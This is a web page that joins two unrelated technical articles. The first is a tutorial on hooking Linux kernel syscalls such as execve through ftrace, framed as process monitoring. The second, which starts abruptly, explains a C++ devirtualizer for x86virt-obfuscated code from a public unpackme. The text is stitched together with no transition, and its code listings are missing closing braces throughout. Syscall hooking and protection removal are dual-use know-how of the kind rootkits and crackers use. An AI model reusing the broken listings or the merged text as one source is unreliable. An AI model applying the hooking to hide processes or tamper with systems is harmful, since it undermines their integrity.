Hooking Linux Kernel Functions, how to Hook Functions with Ftrace

Hooking Linux Kernel Functions, how to Hook Functions with Ftrace

Ftrace is a Linux kernel framework for tracing Linux kernel functions. But our team managed to find a new way to use ftrace when trying to enable system activity monitoring to be able to block suspicious processes. It turns out that ftrace allows you to install hooks from a loadable GPL module without rebuilding the kernel. This approach works for Linux kernel versions 3.19 and higher for the x86_64 architecture.

A new approach: Using ftrace for Linux kernel hooking

What is an ftrace? Basically, ftrace is a framework used for tracing the kernel on the function level. This framework has been in development since 2008 and has quite an impressive feature set. What data can you usually get when you trace your kernel functions with ftrace? Linux ftrace displays call graphs, tracks the frequency and length of function calls, filters particular functions by templates, and so on. Further down this article you’ll find references to official documents and sources you can use to learn more about the capabilities of ftrace.

The implementation of ftrace is based on the compiler options -pg and -mfentry. These kernel options insert the call of a special tracing function — mcount() or __fentry__() — at the beginning of every function. In user programs, profilers use this compiler capability for tracking calls of all functions. In the kernel, however, these functions are used for implementing the ftrace framework.

Calling ftrace from every function is, of course, pretty costly. This is why there’s an optimization available for popular architectures — dynamic ftrace. If ftrace isn’t in use, it nearly doesn’t affect the system because the kernel knows where the calls mcount() or __fentry__() are located and replaces the machine code with nop (a specific instruction that does nothing) at an early stage. And when Linux kernel trace is on, ftrace calls are added back to the necessary functions.

Description of necessary functions

The following structure can be used for describing each hooked function:


 * struct ftrace_hook    describes the hooked function
 * @name:                the name of the hooked function
 * @function:            the address of the wrapper function that will be called instead
 *                       of the hooked function
 * @original:            a pointer to the place where the address
 *                       of the hooked function should be stored, filled out during installation
 *                       of the hook
 * @address:             the address of the hooked function, filled out during installation
 *                       of the hook
 * @ops:                 ftrace service information, initialized by zeros;
 *                       initialization is finished during installation of the hook
struct ftrace_hook {
        const char *name;
        void *function;
        void *original;
        unsigned long address;
        struct ftrace_ops ops;

There are only three fields that the user needs to fill in: name, function, and original. The rest of the fields are considered to be implementation details. You can put the description of all hooked functions together and use macros to make the code more compact:


#define HOOK(_name, _function, _original)                    \
        {                                                    \
            .name = (_name),                                 \
            .function = (_function),                         \
            .original = (_original),                         \
static struct ftrace_hook hooked_functions[] = {
        HOOK("sys_clone",   fh_sys_clone,   &real_sys_clone),
        HOOK("sys_execve",  fh_sys_execve,  &real_sys_execve),

This is what the hooked function wrapper looks like:

 * It’s a pointer to the original system call handler execve().
 * It can be called from the wrapper. It’s extremely important to keep the function signature
 * without any changes: the order, types of arguments, returned value,
 * and ABI specifier (pay attention to “asmlinkage”).
static asmlinkage long (*real_sys_execve)(const char __user *filename,
                const char __user *const __user *argv,
                const char __user *const __user *envp);
 * This function will be called instead of the hooked one. Its arguments are
 * the arguments of the original function. Its return value will be passed on to
 * the calling function. This function can execute arbitrary code before, after,
 * or instead of the original function.
static asmlinkage long fh_sys_execve (const char __user *filename,
                const char __user *const __user *argv,
                const char __user *const __user *envp)
        long ret;
        pr_debug("execve() called: filename=%p argv=%p envp=%p\n",
                filename, argv, envp);
        ret = real_sys_execve(filename, argv, envp);
        pr_debug("execve() returns: %ld\n", ret);
        return ret;

Now, hooked functions have a minimum of extra code. The only thing requiring special attention is the function signatures. They must be completely identical; otherwise, the arguments will be passed on incorrectly and everything will go wrong. This isn’t as important for hooking system calls, though, since their handlers are pretty stable and, for performance reasons, the system call ABI and function call ABI use the same layout of arguments in registers. However, if you’re going to hook other functions, remember that the kernel has no stable interfaces.

Initializing ftrace

Our first step is finding and saving the hooked function address. As you probably know, when using ftrace, Linux kernel tracing can be performed by the function name. However, we still need to know the address of the original function in order to call it.

You can use kallsyms — a list of all kernel symbols — to get the address of the needed function. This list includes not only symbols exported for the modules but actually all symbols. This is what the process of getting the hooked function address can look like:

static int resolve_hook_address (struct ftrace_hook *hook)
        hook->address = kallsyms_lookup_name(hook->name);
        if (!hook->address) {
                pr_debug("unresolved symbol: %s\n", hook->name);
                return -ENOENT;
        *((unsigned long*) hook->original) = hook->address;
        return 0;

Next, we need to initialize the ftrace_ops structure. Here we have one necessary field, func, pointing to the callback. However, some critical flags are needed:

 int fh_install_hook (struct ftrace_hook *hook)
        int err;
        err = resolve_hook_address(hook);
        if (err)
                return err;
        hook->ops.func = fh_ftrace_thunk;
        hook->ops.flags = FTRACE_OPS_FL_SAVE_REGS
                        | FTRACE_OPS_FL_IPMODIFY;
        /* ... */

The fh_ftrace_thunk () feature is our callback that ftrace will call when tracing the function. We’ll talk about this callback later. The flags are needed for hooking — they command ftrace to save and restore the processor registers whose contents we’ll be able to change in the callback.

Now we’re ready to turn on the hook. First, we use ftrace_set_filter_ip() to turn on the ftrace utility for the needed function. Second, we use register_ftrace_function() to give ftrace permission to call our callback:

 int fh_install_hook (struct ftrace_hook *hook)
        /* ... */
        err = ftrace_set_filter_ip(&hook->ops, hook->address, 0, 0);
        if (err) {
                pr_debug("ftrace_set_filter_ip() failed: %d\n", err);
                return err;
        err = register_ftrace_function(&hook->ops);
        if (err) {
                pr_debug("register_ftrace_function() failed: %d\n", err);
                /* Don’t forget to turn off ftrace in case of an error. */
                ftrace_set_filter_ip(&hook->ops, hook->address, 1, 0);
                return err;
        return 0;

To turn off the hook, we repeat the same actions in reverse:

 void fh_remove_hook (struct ftrace_hook *hook)
        int err;
        err = unregister_ftrace_function(&hook->ops);
        if (err)
                pr_debug("unregister_ftrace_function() failed: %d\n", err);
        err = ftrace_set_filter_ip(&hook->ops, hook->address, 1, 0);
        if (err) {
                pr_debug("ftrace_set_filter_ip() failed: %d\n", err);

When the unregister_ftrace_function() call is over, it’s guaranteed that there won’t be any activations of the installed callback or our wrapper in the system. We can unload the hook module without worrying that our functions are still being executed somewhere in the system. Next, we provide a detailed description of the function hooking process.

Hooking functions with ftrace

So how can you configure kernel function hooking? The process is pretty simple: ftrace is able to alter the register state after exiting the callback. By changing the register %rip — a pointer to the next executed instruction — we can change the function executed by the processor. In other words, we can force the processor to make an unconditional jump from the current function to ours and take over control.

This is what the ftrace callback looks like:

 static void notrace fh_ftrace_thunk(unsigned long ip, unsigned long parent_ip,
                struct ftrace_ops *ops, struct pt_regs *regs)
        struct ftrace_hook *hook = container_of(ops, struct ftrace_hook, ops);
        regs->ip = (unsigned long) hook->function;

We get the address of struct ftrace_hook for our function using a macro container_of() and the address of struct ftrace_ops embedded in struct ftrace_hook. Next, we substitute the value of the register %rip in the struct pt_regs structure with our handler’s address. For architectures other than x86_64, this register can have a different name (like PC or IP). The basic idea, however, still applies.

Note that the notrace specifier added for the callback requires special attention. This specifier can be used for marking functions that are prohibited for Linux kernel tracing with ftrace. For instance, you can mark ftrace functions that are used in the tracing process. By using this specifier, you can prevent the system from hanging if you accidentally call a function from your ftrace callback that’s currently being traced by ftrace.

The ftrace callback is usually called with a disabled preemption (just like kprobes), although there might be some exceptions. But in our case, this limitation wasn’t important since we only needed to replace eight bytes of %rip value in the pt_regs structure.

Since the wrapper function and the original are executed in the same context, both functions have the same restrictions. For instance, if you hook an interrupt handler, then sleeping in the wrapper is still out of the question.

Protection from recursive calls

There’s one catch in the code we gave you before: when the wrapper calls the original function, the original function will be traced by ftrace again, thus causing an endless recursion. We came up with a pretty neat way of breaking this cycle by using parent_ip — one of the ftrace callback arguments that contains the return address to the function that called the hooked one. Usually, this argument is used for building function call graphs. However, we can use this argument to distinguish the first traced function call from the repeated calls.

The difference is significant: during the first call, the argument parent_ip will point to some place in the kernel, while during the repeated call it will only point inside our wrapper. You should pass control only during the first function call. All other calls must let the original function be executed.

We can run the entry test by comparing the address to the boundaries of the current module with our functions. However, this approach works only if the module doesn’t contain anything other than the wrapper that calls the hooked function. Otherwise, you’ll need to be more picky.

So this is what a correct ftrace callback looks like:

static void notrace fh_ftrace_thunk (unsigned long ip, unsigned long parent_ip,
                struct ftrace_ops *ops, struct pt_regs *regs)
        struct ftrace_hook *hook = container_of(ops, struct ftrace_hook, ops);
        /* Skip the function calls from the current module. */
        if (!within_module(parent_ip, THIS_MODULE))
                regs->ip = (unsigned long) hook->function;

This approach has three main advantages:

  • Low overhead costs. You need to perform only several comparisons and subtractions without grabbing any spinlocks or iterating through lists.
  • It doesn’t have to be global. Since there’s no synchronization, this approach is compatible with preemption and isn’t tied to the global process list. As a result, you can trace even interrupt handlers.
  • There are no limitations for functions. This approach doesn’t have the main kretprobes drawback and can support any number of trace function activations (including recursive) out of the box. During recursive calls, the return address is still located outside of our module, so the callback test works correctly.

In the next section, we take a more detailed look at the hooking process and describe how ftrace works.

The scheme of the hooking process

So, how does ftrace work? Let’s take a look at a simple example: you’ve typed the command Is in the terminal to see the list of files in the current directory. The command-line interpreter (say, Bash) launches a new process using the common functions fork() plus execve() from the standard C library. Inside the system, these functions are implemented through system calls clone() and execve() respectively. Let’s suggest that we hook the execve() system call to gain control over launching new processes.

Figure 1 below gives an ftrace example and illustrates the process of hooking a handler function.

Linux Kernel Function Tracing hooking

Figure 1. Linux kernel hooking with ftrace.

In this image, we can see how a user process (blue) executes a system call to the kernel (red) where the ftrace framework (violet) calls functions from our module (green).

Below, we give a more detailed description of each step of the process:

  1. The SYSCALL instruction is executed by the user process. This instruction allows switching to the kernel mode and puts the low-level system call handler entry_SYSCALL_64() in charge. This handler is responsible for all system calls of 64-bit programs on 64-bit kernels.
  2. A specific handler receives control. The kernel accomplishes all low-level tasks implemented on the assembler pretty fast and hands over control to the high-level do_syscall_64 () function, which is written in C. This function reaches the system call handler table sys_call_table and calls a particular handler by the system call number. In our case, it’s the function sys_execve ().
  3. Calling ftrace. There’s an __fentry__() function call at the beginning of every kernel function. This function is implemented by the ftrace framework. In the functions that don’t need to be traced, this call is replaced with the instruction nop. However, in the case of the sys_execve() function, there’s no such call.
  4. Ftrace calls our callback. Ftrace calls all registered trace callbacks, including ours. Other callbacks won’t interfere since, at each particular place, only one callback can be installed that changes the value of the %rip register.
  5. The callback performs the hooking. The callback looks at the value of parent_ip leading inside the do_syscall_64() function — since it’s the particular function that called the sys_execve() handler — and decides to hook the function, changing the values of the register %rip in the pt_regs structure.
  6. Ftrace restores the state of the registers. Following the FTRACE_SAVE_REGS flag, the framework saves the register state in the pt_regs structure before it calls the handlers. When the handling is over, the registers are restored from the same structure. Our handler changes the register %rip — a pointer to the next executed function — which leads to passing control to a new address.
  7. Wrapper function receives control. An unconditional jump makes it look like the activation of the sys_execve() function has been terminated. Instead of this function, control goes to our function, fh_sys_execve(). Meanwhile, the state of both processor and memory remains the same, so our function receives the arguments of the original handler and returns control to the do_syscall_64() function.
  8. The original function is called by our wrapper. Now, the system call is under our control. After analyzing the context and arguments of the system call, the fh_sys_execve() function can either permit or prohibit execution. If execution is prohibited, the function returns an error code. Otherwise, the function needs to repeat the call to the original handler and sys_execve() is called again through the real_sys_execve pointer that was saved during the hook setup.
  9. The callback gets control. Just like during the first call of sys_execve(), control goes through ftrace to our callback. But this time, the process ends differently.
  10. The callback does nothing. The sys_execve() function was called not by the kernel from do_syscall_64() but by our fh_sys_execve() function. Therefore, the registers remain unchanged and the sys_execve() function is executed as usual. The only problem is that ftrace sees the entry to sys_execve() twice.
  11. The wrapper gets back control. The system call handler sys_execve() gives control to our fh_sys_execve() function for the second time. Now, the launch of a new process is nearly finished. We can see if the execve() call finished with an error, study the new process, make some notes to the log file, and so on.
  12. The kernel receives control. Finally, the fh_sys_execve() function is finished and control returns to the do_syscall_64() function. The function sees the call as one that was completed normally, and the kernel proceeds as usual.
  13. Control goes to the user process. In the end, the kernel executes the IRET instruction (or SYSRET, but for execve() there can be only IRET), installing the registers for a new user process and switching the processor into user code execution mode. The system call is over and so is the launch of the new process.

As you can see, the process of hooking Linux kernel function calls with ftrace isn’t that complex.


Even though the main purpose of ftrace is to trace Linux kernel function calls rather than hook them, our innovative approach turned out to be both simple and effective. However, the approach we describe above works only for kernel versions 3.19 and higher and only for the x86_64 architecture.

In the final part of our series, we’ll tell you about the main ftrace pros and cons and some unexpected surprises that might be waiting for you if you decide to implement this approach. Meanwhile, you can read about another unusual solution for installing hooks — by using the GCC attribute constructor with LD_PRELOAD.

Ftrace is a Linux utility that ’s usually used for tracing kernel functions. But as we looked for a useful solution that would allow us to enable system activity monitoring and block suspicious processes, we discovered that Linux ftrace can also be used for hooking function calls.

Pros and cons of using ftrace

Ftrace makes hooking Linux kernel functions much easier and has several crucial advantages.

  • A mature API and simple code. Leveraging ready-to-use interfaces in the kernel significantly reduces code complexity. You can hook your kernel functions with ftrace by making only a couple of function calls, filling in two structure fields, and adding a bit of magic in the callback. The rest of the code is just business logic executed around the traced function.
  • Ability to trace any function by name. Linux kernel tracing with ftrace is quite a simple process – writing the function name in a regular string is enough to point to the one you need. You don’t need to struggle with the linker, scan the memory, or investigate internal kernel data structures. As long as you know their names, you can trace your kernel functions with ftrace even if those functions aren’t exported for the modules.

But just like the other approaches that we’ve described in this series, ftrace has a couple of drawbacks.

Kernel configuration requirements. There are several kernel requirements needed to ensure successful ftrace Linux kernel tracing:

  • The list of kallsyms symbols for searching functions by name
  • The ftrace framework as a whole for performing tracing
  • Ftrace options crucial for hooking functions

All these features can be disabled in the kernel configuration since they aren’t critical for the system’s functioning. Usually, however, the kernels used by popular distributions still contain all these kernel options as they don’t affect system performance significantly and may be useful for debugging. Still, you’d better keep these requirements in mind in case you need to support some particular kernels.

Overhead costs. Since ftrace doesn’t use breakpoints, it has lower overhead costs than kprobes. However, the overhead costs are higher than for splicing manually. In fact, dynamic ftrace is a variation of splicing which executes the unneeded ftrace code and other callbacks.

Functions are wrapped as a whole. Just as with usual splicing, ftrace wraps the functions as a whole. And while splicing technically can be executed in any part of the function, ftrace works only at the entry point. You can see this limitation as a disadvantage, but usually it doesn’t cause any complications.

Double ftrace calls. As we’ve explained before, using the parent_ip pointer for analysis leads to calling ftrace twice for the same hooked function. This adds some overhead costs and can disrupt the readings of other traces because they’ll see twice as many calls. This issue can be fixed by moving the original function address five bytes further (the length of the call instruction) so you can basically spring over ftrace.

Let’s take a closer look at some of these disadvantages.

Kernel configuration requirements

The kernel has to support both ftrace and kallsyms. This requires enabling two configuration options:


Next, ftrace has to support a dynamic register modification, which is the responsibility of the following option:


To access the FTRACE_OPS_FL_IPMODIFY flag, the kernel you use has to be based on version 3.19 or higher. Older kernel versions can still modify the register %rip, but from version 3.19, this register can be modified only after setting the flag. In older versions of the kernel, the presence of this flag will lead to a compilation error. For newer versions, the absence of this flag means a non-operating hook.

Last but not least, we need to pay attention to the ftrace call location inside the function. The ftrace call must be located at the beginning of the function, before the function prologue (where the stack frame is formed and the space for local variables is allocated). The following option takes this feature into account:


While the x86_64 architecture does support this option, the i386 architecture doesn’t. The compiler can’t insert an ftrace call before the function prologue due to ABI limitations of the i386 architecture. As a result, by the time you perform an ftrace call the function stack has already been modified, and changing the value of the register isn’t enough for hooking the function. You’ll also need to undo the actions executed in the prologue, which differ from function to function.

This is why ftrace function hooking doesn’t support a 32-bit x86 architecture. In theory, you can still implement this approach by generating and executing an anti-prologue, for instance, but it’ll significantly boost the technical complexity.

Unexpected surprises when using ftrace

At the testing stage, we faced one particular peculiarity: hooking functions on some distributions led to the permanent hanging of the system. Of course, this problem occurred only on systems that were different from those used by our developers. We also couldn’t reproduce the problem with the initial hooking prototype on any distributions or kernel versions.

According to debugging, the system got stuck inside the hooked function. For some unknown reason, the parent_ip still pointed to the kernel instead of the function wrapper when calling the original function inside the ftrace callback. This launched an endless loop wherein ftrace called our wrapper again and again while doing nothing useful.

Fortunately, we had both working and broken code and eventually discovered what was causing the problem. When we unified the code and got rid of the pieces we didn’t need at the moment, we narrowed down the differences between the two versions of the wrapper function code.

This is the stable code:

static asmlinkage long fh_sys_execve(const char __user *filename,
                const char __user *const __user *argv,
                const char __user *const __user *envp)
        long ret;
        pr_debug("execve() called: filename=%p argv=%p envp=%p\n",
                filename, argv, envp);
        ret = real_sys_execve(filename, argv, envp);
        pr_debug("execve() returns: %ld\n", ret);
        return ret;

And this is the code that caused the system to hang:

static asmlinkage long fh_sys_execve(const char __user *filename,
                const char __user *const __user *argv,
                const char __user *const __user *envp)
        long ret;
        pr_devel("execve() called: filename=%p argv=%p envp=%p\n",
                filename, argv, envp);
        ret = real_sys_execve(filename, argv, envp);
        pr_devel("execve() returns: %ld\n", ret);
        return ret;

How can the logging level possibly affect system behavior? Surprisingly enough, when we took a closer look at the machine code of these two functions, it became obvious that the reason behind these problems was the compiler.

It turns out that the pr_devel() calls are expanded into no-op. This printk-macro version is used for logging at the development stage. And since these logs pose no interest at the operating stage, the system simply cuts them out of the code automatically unless you activate the DEBUG macro. After that, the compiler sees the function like this:

static asmlinkage long fh_sys_execve(const char __user *filename,
                const char __user *const __user *argv,
                const char __user *const __user *envp)
        return real_sys_execve(filename, argv, envp);

And this is where optimizations take the stage. In our case, the so-called tail call optimization was activated. If a function calls another and returns its value immediately, this optimization lets the compiler replace a function call instruction with a cheaper direct jump to the function’s body. This is what this call looks like in machine code:

0000000000000000 <fh_sys_execve>:
   0:   e8 00 00 00 00          callq  5 <fh_sys_execve+0x5>
   5:   ff 15 00 00 00 00       callq  *0x0(%rip)
   b:   f3 c3                   repz retq </fh_sys_execve>

And this is an example of the broken call:

0000000000000000 <fh_sys_execve>:
   0:   e8 00 00 00 00          callq  5 <fh_sys_execve+0x5>
   5:   48 8b 05 00 00 00 00    mov    0x0(%rip),%rax
   c:   ff e0                   jmpq   *%rax </fh_sys_execve>

The first CALL instruction is the exact same __fentry__() call that the compiler inserts at the beginning of all functions. But after that, the broken and the stable code act differently. In the stable code, we can see the real_sys_execve call (via a pointer stored in memory) performed by the CALL instruction, which is followed by fh_sys_execve() with the help of the RET instruction. In the broken code, however, there’s a direct jump to the real_sys_execve() function performed by JMP.

The tail call optimization allows you to save some time by not allocating a useless stack frame that includes the return address that the CALL instruction stores in the stack. But since we’re using parent_ip to decide whether we need to hook, the accuracy of the return address is crucial for us. After optimization, the fh_sys_execve() function doesn’t save the new address on the stack anymore, so there’s only the old one leading to the kernel. And this is why the parent_ip keeps pointing inside the kernel and that endless loop appears in the first place.

This is also the main reason why the problem appeared only on some distributions. Different distributions use different sets of compilation flags for compiling the modules. And in all the problem distributions, the tail call optimization was active by default.

We managed to solve this problem by turning off tail call optimization for the entire file with the wrapper functions:

  • #pragma GCC optimize(«-fno-optimize-sibling-calls»)

For further hooking experiments, you can use the full kernel module code from GitHub.


While developers typically use ftrace to trace Linux kernel function calls, this utility showed itself to be rather useful for hooking Linux kernel functions as well. And even though this approach has some disadvantages, it gives you one crucial benefit: overall simplicity of both the code and the hooking process.


Project: x86-devirt

Unpackme — x86 Virtualizer

Today, I am going to be going through how x86devirt works to disassemble and devirtualize the behaviour of code obfuscated using the x86virt virtual machine. I needed several tools to complete this task, the development of which will be covered in this article.

A code virtualizer protects code behaviour by retargeting some subroutines or sections of code from the x86/x64 platform (which is well understood and documented) into a (usually somewhat random) platform that we do not understand. Additionally, the tools we use to discover and analyze behaviour in executable code (such as radare2 or x64dbg) also do not understand it well. This makes identifying malicious behaviour, developing generic signatures or extracting other behavioral details from the code impossible without reversing the process in some way.

While it costs a large overhead in performance, obfuscation using code virtualization is very effective. Depending on the complexity of the protector/virtualizer, these packers can be very painful and tedious to work through.


You can see the final product (devirtualizer) of this article at the following GitHub URL: https://github.com/JeremyWildsmith/x86devirt

We are reverse engineering an unpackme by ReWolf at the following URL: https://tuts4you.com/download/1850/

This sample has been packed with an open-source application by ReWolf that is publicly posted on GitHub at the following URL: https://github.com/rwfpl/rewolf-x86-virtualizer

If you would like to look at a very simple example of a virtual machine, I have a project up on my GitHub that demonstrates the basic function of a VM Stub and you can see how exactly it works. The project is located at the following URL: https://github.com/JeremyWildsmith/StackLang

Tools / Knowledge

In this article I am going to use the following tools & knowledge:

  • The disassembler, written in the C++ programming language
  • x86 Intel Assembly
  • YARA Signatures
  • The udis86 library, used to disassemble x86 instructions
  • Python, used to automate x64dbg and the x64dbgpy plugin, as well as run Angr simulations to extract the jmp mappings
  • The x86virt unpackme sample by ReWolf on tuts4you.com (https://tuts4you.com/download/1850/)

How the x86virt VM Works

Before I dive into how x86devirt works, I am going to give a brief overview on my findings of how the x86virt VM works.

x86virt starts by taking the application to be protected and grabbing some subroutines that it has decided to protect. The x86 code for these subroutines is translated into an instruction set that uses the following format:

(Instruction Size)(Instruction Prefix)(Instruction Data)

  • Instruction Size — The size in bytes of the instruction
  • Instruction Prefix — This is 0xFFFF if the instruction is a VM instruction. Otherwise, the remaining bytes in the instruction data (and instruction prefix) should be interpreted as a x86 instruction
  • Instruction Data — If (Instruction Prefix) is 0xFFFF, this is the VM Opcode bytes followed by the operand bytes. Otherwise, these bytes are appended to the (Instruction Prefix) to form a valid x86 instruction.

For every VM Layer or virtualized target, x86virt randomizes the opcodes for that VM. So when we devirtualize, we need to map the opcodes to their respective VM instruction.

x86virt also takes instructions like the ones below:

mov eax, [esp + 0x8]

And translates them into something like this:

mov VMR, 0x8
add VMR, esp
mov eax, [VMR]

VMR is a register that only exists in the virtual machine, so during devirtualization, we need to interpret this and translate it back into its original form.

Finally, x86virt encrypts the entire instruction using an encryption algorithm that is, to some extent, randomized. Every time an instruction is executed, it is first decrypted and then interpreted. However, there is one consistency with instruction encryption between targets and VM layers: regardless of how the instruction was encrypted, in its encrypted form, the first byte XORed with the second byte will always give you the instruction length.

Another important note regarding instruction encryption is that the key to decrypt it is the address of that VM instruction relative to the start of the virtual function/code stub it belongs to. In other words, the key is the offset to that instruction in the function that has been virtualized. This means you cannot just blindly decrypt all the instructions in a function. You must do proper control flow analysis to determine where in memory the valid bytecode instructions are by identifying and following conditional or unconditional jumps.

So to disassemble an x86virt VM instruction, we must know:

  1. The size of the instruction
  2. The offset to that instruction
  3. The encryption algorithm (because it is somewhat random)

There is one last piece of the puzzle that we must consider when disassembling x86virt VM code. The conditional jumps for x86virt VM are encoded with a jump type operand. The part of the code that interprets the jump type operand is also somewhat random between VM layers and virtualized targets. We need to handle this case in our devirtualizer as well.

The x86devirt Disassembler

An important part to the x86-devirtualizer is the disassembler. The role of this module is to take a stub of virtualized, encrypted x86virt bytecode that has been extracted from the protected application and produce a NASM x86 Assembly translation of the encrypted bytecode. To do this, it needs a few pieces of information from the protected application:

  1. A dump of the decryption algorithm that the VM stub uses to decrypt VM instruction before interpreting them
  2. The mappings of opcodes to their respective behaviour, since the opcodes are randomized (i.e, 0x33 maps to add, 0x22 maps to mov)
  3. The mappings of jmp type operand to their respective jump behavior (i.e, jmp type 2 maps to je, 3 maps to jne, etc…)
  4. A dump of the function / stub of code to be devirtualized

We will see how this information is extracted by looking at the x86devirt.py x64dbg plugin later, but for now we will assume we have been provided this information.

The first step is to get the instruction length, decrypt the instruction and then identify whether we should interpret the instruction as an x86 instruction or a VM bytecode instruction. We see this being done in disassemblers’ decodeVmInstruction method:

unsigned int decodeVmInstruction(vector<DecodedVmInstruction>& decodedBuffer, uint32_t vmRelativeIp, VmInfo& vmInfo) {

    uint32_t instrLength = getInstructionLength(vmInfo.getBaseAddress() + vmRelativeIp, vmInfo);

    //Read with offset 1, to trim off instr length byte
    unique_ptr<uint8_t[]> instrBuffer = vmInfo.readMemory(vmInfo.getBaseAddress() + vmRelativeIp + 1, instrLength);
    vmInfo.decryptMemory(instrBuffer.get(), instrLength, vmRelativeIp);

    DecodedInstructionType_t instrType = DecodedInstructionType_t::INSTR_UNKNOWN;

    if(*reinterpret_cast<unsigned short*>(instrBuffer.get()) == 0xFFFF) {
        //Offset by 2 which removes the 0xFFFF part of the instruction.

        //Map instructions correctly
        instrBuffer[2] = vmInfo.getOpcodeMapping(instrBuffer[2]);
        decodedBuffer = disassembleVmInstruction(instrBuffer.get() + 2, instrLength - 2, vmRelativeIp, vmInfo);
    } else {
        decodedBuffer = disassemble86Instruction(instrBuffer.get(), instrLength, vmInfo.getBaseAddress() + vmRelativeIp);

    return instrLength + 1;

We see that the size is extracted using the getInstructionLength method (this will simply XOR the first two bytes to get the length). After that, the instruction is decrypted by using the dumped decryption subroutine extracted from the protected application (a more proper approach would be to emulate the code rather than directly executing it). Finally, we examine the first word to identify how to decode the instruction (as an x86 instruction or as a VM instruction). If the instruction is a VM bytecode instruction, we need to look up the opcode in the opcode mapping to determine what behaviour it maps to.

The way we disassemble x86 instructions is by using the udis86 library, and also keeping some basic information about the disassembled instruction. You can see how that is done below:

vector<DecodedVmInstruction> disassemble86Instruction(const uint8_t* instrBuffer, uint32_t instrLength, const uint32_t instrAddress) {
    DecodedVmInstruction result;
    result.isDecoded = false;
    result.address = instrAddress;
    result.controlDestination = 0;
    result.size = instrLength;

    memcpy(result.bytes, instrBuffer, instrLength);

    ud_set_input_buffer(&ud_obj, instrBuffer, instrLength);
    ud_set_pc(&ud_obj, instrAddress);
    unsigned int ret = ud_disassemble(&ud_obj);
    strcpy(result.disassembled, ud_insn_asm(&ud_obj));

    if(ret == 0)
        result.type = DecodedInstructionType_t::INSTR_UNKNOWN;
        result.type = (!strncmp(result.disassembled, "ret", 3) ? DecodedInstructionType_t::INSTR_RETN : DecodedInstructionType_t::INSTR_MISC);

    vector<DecodedVmInstruction> resultSet;

    return resultSet;

When it comes to disassembling x86virt bytecode instructions, we do that with a different subroutine, disassembleVmInstruction. The purpose of this subroutine is fairly straightforward so I won’t bore you by reading the code line by line. However, some interesting cases are case 1 and case 2, which are essentially x86 instructions with VMR as the operand. It is also worth noting case 7 where the decoding of x86virt jump instructions are handled and case 16 which just signals for the VM to stop interpreting (and has no x86 equivalent)

Once we can disassemble the instructions, we need to properly identify where they are. As was previously mentioned, this requires some control flow analysis. During control flow analysis, the disassembler identifies the different blocks of code in a subroutine by using the getDisassembleRegions function. The getDisassembleRegions basically returns the regions of code in a method that can be reached using conditional or unconditional jumps inside of a virtualized function. We can see its behaviour below:

vector<DisassembledRegion> getDisassembleRegions(const uint32_t initialIp, VmInfo& vmInfo) {
    vector<DisassembledRegion> disassembledStubs;
    queue<uint32_t> stubsToDisassemble;

    while(!stubsToDisassemble.empty()) {
        uint32_t vmRelativeIp = stubsToDisassemble.front() - vmInfo.getBaseAddress();

        if(isInRegions(disassembledStubs, vmRelativeIp))

        DisassembledRegion current;
        current.min = vmRelativeIp;

        bool continueDisassembling = true;
        while(vmRelativeIp <= vmInfo.getDumpSize() && continueDisassembling) {

            vector<DecodedVmInstruction> instrSet;

            vmRelativeIp += decodeVmInstruction(instrSet, vmRelativeIp, vmInfo);

            for(auto& instr : instrSet) {
                if(instr.type == DecodedInstructionType_t::INSTR_UNKNOWN) {
                    stringstream msg;
                    msg << "Unknown instruction encountered: 0x" << hex << ((unsigned long)instr.bytes[0]);
                    throw runtime_error(msg.str());

                if(instr.type == DecodedInstructionType_t::INSTR_JUMP || instr.type == DecodedInstructionType_t::INSTR_CONDITIONAL_JUMP)

                if(instr.type == DecodedInstructionType_t::INSTR_STOP || instr.type == DecodedInstructionType_t::INSTR_RETN || instr.type == DecodedInstructionType_t::INSTR_JUMP)
                    continueDisassembling = false;

        current.max = vmRelativeIp;

    //Now we must resolve all overlapping stubs
    for(auto it = disassembledStubs.begin(); it != disassembledStubs.end();) {
        if(isInRegions(disassembledStubs, it->min, it->max))

    return disassembledStubs;

The getDisassembleRegions performs the following functionality:

  1. Disassemble the virtualized subroutine from its start address and continues to do so until it encounters a jump (conditional or unconditional) or a return.
  2. If a conditional jump is encountered, its destination address is queued up to be the next region to be disassembled and the disassembler continues executing.
  3. If an unconditional jump is encountered, the destination address is queued up and disassembling of the current block ends
  4. If a ret is encountered, disassembling of the current block ends.
  5. Loops until there are no more regions to be disassembled.

The problem with the above algorithm is that it will identify code such as what is seen below:

jmp labelB
jz labelD

As having overlapping blocks of code, which will result in redundant blocks of code and thus redundant disassembled output. This was solved by testing for and removing smaller overlapping regions:

    //Now we must resolve all overlapping stubs
    for(auto it = disassembledStubs.begin(); it != disassembledStubs.end();) {
        if(isInRegions(disassembledStubs, it->min, it->max))

    return disassembledStubs;

After we know the basic blocks of a subroutine that contain valid executable code, we can begin disassembling them. This is done in the disassembleStub routine:

bool disassembleStub(const uint32_t initialIp, VmInfo& vmInfo) {

    vector<DisassembledRegion> stubs = getDisassembleRegions(initialIp, vmInfo);

    //Needs to be sorted, otherwise (due to jump sizes) may not fit into original location
    //Sorting should match it with the way it was implemented.
    sort(stubs.begin(), stubs.end(), sortRegionsAscending);

    if(stubs.empty()) {
        printf(";No stubs detected to disassemble.. %d", stubs.size());
        return true;

    vector<DecodedVmInstruction> instructions;
    for(auto& stub : stubs) {

        bool continueDisassembling = true;
        DecodedVmInstruction blockMarker;
        blockMarker.type = DecodedInstructionType_t::INSTR_COMMENT;
        strcpy(blockMarker.disassembled, "BLOCK");
        for(uint32_t vmRelativeIp = stub.min; continueDisassembling && vmRelativeIp < stub.max;) {

            vector<DecodedVmInstruction> instrSet;

            vmRelativeIp += decodeVmInstruction(instrSet, vmRelativeIp, vmInfo);

            for(auto& instr : instrSet) {
                if(instr.type == DecodedInstructionType_t::INSTR_UNKNOWN)
                    throw runtime_error("Unknown instruction encountered");

                if(instr.type == DecodedInstructionType_t::INSTR_STOP) {
                    continueDisassembling = false;




    for(auto& i : eliminateVmr(instructions)) {

    return true;

